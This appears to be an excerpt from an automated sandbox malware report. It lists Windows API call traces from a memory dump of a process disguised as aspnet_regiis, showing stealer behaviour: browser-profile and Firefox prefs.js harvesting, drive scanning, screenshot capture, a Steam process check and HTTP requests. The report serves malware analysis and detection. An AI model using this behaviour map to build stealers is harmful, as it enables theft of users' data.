                                                                                                                              • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                              • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                              • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                              • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                              • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                            • wsprintfA.USER32 ref: 00411949
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: /$UT
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                            • String ID: ERROR$ERROR$GET
                                                                                                                            APIs
                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                            • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                            • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                            • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                            • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                              • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                              • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                            • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                            • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                            • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                            • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                            • String ID:
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                            • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                              • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                            • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 1475085387-1173974218
                                                                                                                            • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                            • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                            • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                            • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                            APIs
                                                                                                                            • wsprintfA.USER32 ref: 0041546A
                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                            • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                            • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                            • String ID: %s\%s
                                                                                                                            • API String ID: 1150833511-4073750446
                                                                                                                            • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                            • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                                            • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                            • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                            • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                            • API String ID: 2567437900-1710495004
                                                                                                                            • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                            • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                                            • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                            • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                                            APIs
                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                            • _memset.LIBCMT ref: 004151E5
                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                              • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                              • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                              • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                              • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                              • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                              • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                              • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                              • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                              • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                            • API String ID: 441469471-147700698
                                                                                                                            • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                            • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                            • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                            • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                                            • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 0040D956
                                                                                                                            • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                            • String ID: prefs.js
                                                                                                                            • API String ID: 893096357-3783873740
                                                                                                                            • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                            • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                                            • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                                            • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                            • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                                            • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3801961486-0
                                                                                                                            • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                            • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                            • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                            • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                            • String ID: steam.exe
                                                                                                                            • API String ID: 1799959500-2826358650
                                                                                                                            • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                            • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                                            • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                            • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
